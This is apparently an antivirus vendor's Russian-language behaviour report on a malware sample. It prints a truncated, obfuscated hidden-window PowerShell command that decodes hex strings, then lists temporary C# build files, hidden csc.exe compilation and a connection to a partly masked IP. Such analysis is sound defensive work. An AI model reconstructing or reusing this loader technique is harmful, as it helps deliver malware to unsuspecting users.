Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function a78785 {param($cdd97)$ya3ec='n298b66';$vcd949='';for ($i=0; $i -lt $cdd97.length;$i+=2){$le56fce=[convert]::ToByte($cdd97.Substring($i,2),16);$vcd949+=[char]($le5...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\k-xzk8ck.0.cs
- %TEMP%\k-xzk8ck.cmdline
- %TEMP%\k-xzk8ck.out
- %TEMP%\cscb4c.tmp
- %TEMP%\resb5d.tmp
- %TEMP%\k-xzk8ck.dll
Удаляет следующие файлы
- %TEMP%\resb5d.tmp
- %TEMP%\cscb4c.tmp
- %TEMP%\k-xzk8ck.pdb
- %TEMP%\k-xzk8ck.dll
- %TEMP%\k-xzk8ck.0.cs
- %TEMP%\k-xzk8ck.out
- %TEMP%\k-xzk8ck.cmdline
Сетевая активность
Подключается к
- '51.##.175.221':80
Другое
Создает и запускает на исполнение
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\k-xzk8ck.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESB5D.tmp" "%TEMP%\CSCB4C.tmp"' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\k-xzk8ck.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESB5D.tmp" "%TEMP%\CSCB4C.tmp"
